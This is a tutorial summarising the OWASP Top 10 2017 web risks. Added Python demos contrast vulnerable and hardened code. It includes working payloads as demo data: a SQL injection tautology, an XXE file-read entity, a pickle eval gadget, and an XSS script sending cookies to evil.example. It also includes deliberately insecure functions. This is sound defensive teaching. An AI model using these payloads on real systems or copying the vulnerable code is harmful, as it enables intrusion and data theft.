OWASP Top 10 2017 (The Ten Most Critical Web Application Security Risks)

1. Injection

Injection flaws, such as SQL, NoSQL, OS command and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
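The following is an added example, not code from the original article: the same login lookup written by string concatenation and then as a parameterized query, run against an in-memory SQLite database. The table, rows and the tautology payload are constructed for the demo.

```python
# Added example: SQL injection through string concatenation versus a
# parameterized query. Table, rows and credentials are constructed for this demo.
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Throwaway users table with two sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> List[str]:
    """Query text is assembled from user input, so the input becomes SQL.
    With the payload below the WHERE clause reads
    name = 'alice' AND password = '' OR '1'='1', which is true for every row."""
    sql = (
        "SELECT name FROM users WHERE name = '" + name + "' "
        "AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> List[str]:
    """Parameterized query: the statement is fixed and the driver passes the
    values separately, so quotes in the input are just characters in a value."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


PAYLOAD = "' OR '1'='1"  # classic tautology typed into the password field

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "alice", PAYLOAD))  # every user
    print("safe:      ", login_safe(db, "alice", PAYLOAD))        # no rows
```

Parameterization protects values only. Table and column names, ORDER BY targets and similar identifiers cannot be bound as parameters and must come from a fixed allowlist in the application, never from the request.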

2. Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

3. Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data such as financial, healthcare and personally identifiable information (PII). Attackers may steal or modify such weakly protected data to commit credit card fraud, identity theft or other crimes. Sensitive data deserves extra protection: encryption at rest and in transit, and special precautions when it is exchanged with the browser.

4. XML External Entities (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files through the file URI handler, reach internal file shares, scan internal ports, execute remote code and mount denial-of-service attacks.
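An added example (not from the original article) showing the mechanism with Python's low-level expat binding. Python's standard-library parsers do not fetch external entities on their own, so parse_permissive deliberately installs a resolver to behave like an XML stack that resolves SYSTEM entities by default; parse_hardened instead aborts on any DOCTYPE, before an entity can even be declared. The payload, the secret file and the element names are constructed for the demo, and POSIX file paths are assumed.

```python
# Added example: XXE file disclosure reproduced with a permissive resolver,
# and a hardened parser that refuses DOCTYPE/entity declarations outright.
import os
import tempfile
import xml.parsers.expat as expat
from typing import List, Tuple
from urllib.parse import urlparse


class UnsafeXML(ValueError):
    """Raised by the hardened parser when a document carries a DOCTYPE."""


def parse_permissive(xml_text: str) -> str:
    """Return the document's character data, resolving file: external entities
    the way a permissive XML processor would. This is the vulnerable behaviour."""
    parser = expat.ParserCreate()
    chunks: List[str] = []
    parser.CharacterDataHandler = chunks.append

    def resolve(context, base, system_id, public_id):
        url = urlparse(system_id)
        if url.scheme != "file":
            return 0  # tells expat the reference could not be resolved
        with open(url.path, "rb") as fh:
            body = fh.read()
        # The child parser inherits the handlers, so the file's bytes land in
        # `chunks` exactly as if they had been written inside the element.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_text, True)
    return "".join(chunks)


def parse_hardened(xml_text: str) -> str:
    """Same extraction, but a DOCTYPE or entity declaration aborts parsing
    before any entity can be defined, let alone resolved."""
    parser = expat.ParserCreate()
    chunks: List[str] = []
    parser.CharacterDataHandler = chunks.append

    def reject(*_args):
        raise UnsafeXML("DOCTYPE and entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject  # defence in depth
    parser.Parse(xml_text, True)
    return "".join(chunks)


def demo() -> Tuple[str, str]:
    """Write a throwaway secret, aim an XXE payload at it, and return what the
    permissive parser leaked and the error the hardened parser raised."""
    fd, path = tempfile.mkstemp(suffix=".conf")
    with os.fdopen(fd, "w") as fh:
        fh.write("db_password=hunter2")  # constructed secret, not real data
    try:
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file://{path}">]>'
            "<order><item>&xxe;</item></order>"
        )
        leaked = parse_permissive(payload)
        try:
            parse_hardened(payload)
            blocked = ""
        except UnsafeXML as exc:
            blocked = str(exc)
        return leaked, blocked
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("permissive parser returned:", leaked)
    print("hardened parser raised:", blocked)
```

Rejecting the DOCTYPE is the simplest complete fix because it also removes internal entity expansion (the "billion laughs" denial of service) and parameter entities used for out-of-band exfiltration. Where a DTD is genuinely required, disable external entity resolution in the parser's configuration and keep the resolver from touching file: or network schemes; the third-party defusedxml package applies the same idea to the standard-library parsers.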

5. Broken Access Control

Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality or data, for example by viewing other users' accounts and sensitive files, modifying other users' data or changing access rights.
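An added example, not from the original article: an invoice lookup with the typical insecure direct object reference (the handler checks only that the caller is logged in) next to a deny-by-default version that enforces an object-level rule. The users, roles and invoice records are constructed for the demo.

```python
# Added example: IDOR versus object-level authorization, deny by default.
# Users, roles and the invoice "database" are constructed for this demo.
from dataclasses import dataclass
from typing import Optional


class Forbidden(Exception):
    """Authenticated, but not allowed to act on this object."""


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "customer" or "admin"


# Pretend database: invoice id -> (owner user id, amount)
INVOICES = {
    1001: (1, "EUR 120.00"),
    1002: (2, "EUR 87.50"),
}


def get_invoice_vulnerable(current_user: Optional[User], invoice_id: int) -> str:
    """Checks only that *someone* is logged in. A customer who edits the id in
    the URL reads another customer's invoice: an insecure direct object reference."""
    if current_user is None:
        raise PermissionError("login required")
    _owner, amount = INVOICES[invoice_id]
    return amount


def authorized(current_user: User, invoice_id: int) -> bool:
    """Object-level rule, deny by default: the owner or an admin may read.
    An unknown id is treated as 'not yours' so callers cannot enumerate ids."""
    record = INVOICES.get(invoice_id)
    if record is None:
        return False
    owner, _amount = record
    return current_user.role == "admin" or owner == current_user.user_id


def get_invoice(current_user: Optional[User], invoice_id: int) -> str:
    """Authentication first, then the authorization check, enforced on the
    server for every request rather than trusted from hidden UI elements."""
    if current_user is None:
        raise PermissionError("login required")
    if not authorized(current_user, invoice_id):
        raise Forbidden("invoice not available")
    return INVOICES[invoice_id][1]


if __name__ == "__main__":
    bob = User(user_id=2, role="customer")
    print("vulnerable:", get_invoice_vulnerable(bob, 1001))  # alice's invoice
    print("own invoice:", get_invoice(bob, 1002))
    try:
        get_invoice(bob, 1001)
    except Forbidden as exc:
        print("blocked:", exc)
```

The check belongs in one place that every code path goes through (a service layer or decorator), and tests should cover both the negative case (another user's id) and the "unknown id" case, since an error message that differs between the two gives away which ids exist.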

6. Security Misconfiguration

Security misconfiguration is the most commonly seen issue. It usually results from insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries and applications be securely configured, they must also be patched and upgraded in a timely fashion.

7. Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data through a browser API that can create HTML or JavaScript. XSS lets attackers execute scripts in the victim's browser, which can hijack user sessions, deface web sites or redirect the user to malicious sites.
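An added example (not from the original article): a server-side template that drops an untrusted display name into the page body and into a quoted attribute, first by plain interpolation and then with the standard library's html.escape. The two payloads are constructed for the demo; contains_live_markup is a crude oracle for the demo only, not a real XSS detector.

```python
# Added example: reflected XSS via string interpolation versus context-aware
# escaping. Payloads are constructed for this demo.
import html


def render_vulnerable(display_name: str) -> str:
    """Untrusted text goes straight into the markup, in two contexts."""
    return (
        f"<p>Welcome, {display_name}!</p>"
        f'<input type="text" value="{display_name}">'
    )


def render_safe(display_name: str) -> str:
    """Escape &, <, > and, because quote=True, also " and ', which is what a
    value inside a double-quoted attribute needs."""
    safe_text = html.escape(display_name, quote=True)
    return (
        f"<p>Welcome, {safe_text}!</p>"
        f'<input type="text" value="{safe_text}">'
    )


def contains_live_markup(page: str) -> bool:
    """Demo oracle: does the page still contain an unescaped script tag or the
    attribute break-out? Real verification belongs in a browser/DOM test."""
    return "<script" in page or '" onmouseover=' in page


# Body context: inject a tag that ships the session cookie to the attacker.
BODY_PAYLOAD = "<script>location='https://evil.example/?c='+document.cookie</script>"
# Attribute context: close the value="" and add an event handler.
ATTR_PAYLOAD = '" onmouseover="alert(1)'

if __name__ == "__main__":
    for payload in (BODY_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable live markup:", contains_live_markup(render_vulnerable(payload)))
        print("safe live markup:      ", contains_live_markup(render_safe(payload)))
        print(render_safe(payload))
```

Escaping is context specific: the HTML-body/attribute encoder above is wrong for data placed inside a script block, a URL or a CSS value, which need their own encoders, and none of it helps against DOM-based XSS where client-side code writes user data through innerHTML or similar browser APIs. A Content Security Policy that disallows inline script limits the damage when an escaping bug slips through.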

8. Insecure Deserialization

Insecure deserialization often leads to remote code execution. Even when a deserialization flaw does not result in remote code execution, it can be used for attacks including replay attacks, injection attacks and privilege escalation.
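An added example, not from the original article, using Python's pickle as the concrete serializer: a payload that executes attacker-chosen code when loaded, the restricted Unpickler pattern from the Python documentation that allowlists which globals may be resolved, and the usual alternative of a data-only format (JSON) with explicit validation of the fields. The Gadget class, the eval expression and the order records are constructed for the demo.

```python
# Added example: code execution on pickle.loads, a restricted unpickler that
# allowlists globals, and JSON plus validation as the data-only alternative.
import io
import json
import os
import pickle
from typing import Dict


class Gadget:
    """Any class pickle can reach may define __reduce__; the unpickler calls
    whatever callable it names. Here that callable is eval on attacker text."""

    def __reduce__(self):
        return (eval, ("__import__('os').getcwd()",))


def hostile_payload() -> bytes:
    """What an attacker would send instead of a legitimate serialized object."""
    return pickle.dumps(Gadget())


def load_vulnerable(data: bytes):
    """pickle.loads runs the gadget; the 'object' it returns is eval's result."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an explicit allowlist of globals; everything else fails.
    Even builtins must be chosen carefully, so the list stays tiny."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_json_order(data: str) -> Dict:
    """Data-only format plus schema-style validation: nothing executes on load,
    and unexpected fields or types are rejected instead of silently accepted."""
    obj = json.loads(data)
    if not isinstance(obj, dict) or set(obj) != {"item", "qty"}:
        raise ValueError("unexpected fields")
    if not isinstance(obj["item"], str) or not isinstance(obj["qty"], int) or obj["qty"] <= 0:
        raise ValueError("bad field types")
    return obj


def demo() -> Dict:
    """Run the three loaders against the hostile payload and a benign order."""
    hostile = hostile_payload()
    benign = pickle.dumps({"item": "widget", "qty": 2})
    try:
        load_restricted(hostile)
        restricted_blocked = False
    except pickle.UnpicklingError:
        restricted_blocked = True
    try:
        load_json_order('{"item": "widget", "qty": 2, "__class__": "Gadget"}')
        json_rejected_extra = False
    except ValueError:
        json_rejected_extra = True
    return {
        "vulnerable_ran_eval": load_vulnerable(hostile) == os.getcwd(),
        "restricted_blocked": restricted_blocked,
        "restricted_benign": load_restricted(benign),
        "json_ok": load_json_order('{"item": "widget", "qty": 2}'),
        "json_rejected_extra": json_rejected_extra,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The restricted unpickler still parses attacker-controlled bytes with a stack machine, so it is a mitigation rather than a cure; when the format can be chosen, prefer a data-only serialization and, where serialized objects must cross a trust boundary, sign them (an HMAC over the bytes) and verify before deserializing.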

9. Using Components with Known Vulnerabilities

Components such as libraries, frameworks and other software modules run with the same privileges as the application. If a vulnerable component is exploited, the attack can cause serious data loss or server takeover. Applications and APIs that use components with known vulnerabilities may undermine application defenses and enable a range of attacks with severe impact.

10. Insufficient Logging and Monitoring

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to attack systems further, maintain persistence, pivot to more systems, and tamper with, extract or destroy data. Most breach studies show that the time to detect a breach exceeds 200 days, and that breaches are typically detected by external parties rather than by internal processes or monitoring.
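An added example, not from the original article, of the kind of detection that becomes possible only when login events are logged with the fields an analyst needs (timestamp, principal, source address, outcome): a per-source sliding window over failed logins that raises an alert when a threshold is reached and a second one when a success follows a run of failures. The JSON log lines, field names and thresholds are constructed for the demo.

```python
# Added example: brute-force detection over structured login events.
# The log lines, field names and thresholds are constructed for this demo.
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Constructed sample: one JSON object per line, as an application might emit.
SAMPLE_LOG = """\
{"ts": "2017-11-20T10:00:01Z", "event": "login", "user": "alice", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:00:12Z", "event": "login", "user": "alice", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:00:20Z", "event": "login", "user": "bob", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:00:35Z", "event": "login", "user": "bob", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:01:02Z", "event": "login", "user": "carol", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:01:40Z", "event": "login", "user": "carol", "src_ip": "203.0.113.7", "outcome": "failure"}
{"ts": "2017-11-20T10:02:10Z", "event": "login", "user": "carol", "src_ip": "203.0.113.7", "outcome": "success"}
{"ts": "2017-11-20T10:02:30Z", "event": "login", "user": "dave", "src_ip": "198.51.100.4", "outcome": "failure"}
{"ts": "2017-11-20T10:02:45Z", "event": "login", "user": "dave", "src_ip": "198.51.100.4", "outcome": "success"}
"""


def parse_events(text: str) -> List[Dict]:
    """Parse JSON lines and turn the timestamp into a datetime for arithmetic."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def detect_bruteforce(events: Iterable[Dict], threshold: int = 5,
                      window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Per-source sliding window over login failures. One alert per source when
    failures inside the window reach the threshold (password spraying across
    users counts too, since the key is the source, not the account), and one
    more when a success follows a run of failures from that source."""
    failures = defaultdict(deque)  # src_ip -> timestamps of recent failures
    alerted = set()
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev.get("event") != "login":
            continue
        ip = ev["src_ip"]
        q = failures[ip]
        while q and ev["ts"] - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if ev["outcome"] == "failure":
            q.append(ev["ts"])
            if len(q) >= threshold and ip not in alerted:
                alerts.append({"type": "bruteforce", "src_ip": ip,
                               "failures": len(q), "last_user": ev["user"]})
                alerted.add(ip)
        elif ev["outcome"] == "success" and len(q) >= 3:
            alerts.append({"type": "success_after_failures", "src_ip": ip,
                           "user": ev["user"], "prior_failures": len(q)})
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

None of this works if the application logs "login failed" without the source address or principal, if logs stay on the host that was compromised, or if nobody is paged when an alert fires. Ship events to a separate store, protect them from tampering by the application's own account, and wire alerts into the incident response process so detection takes minutes rather than the 200-plus days quoted above.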
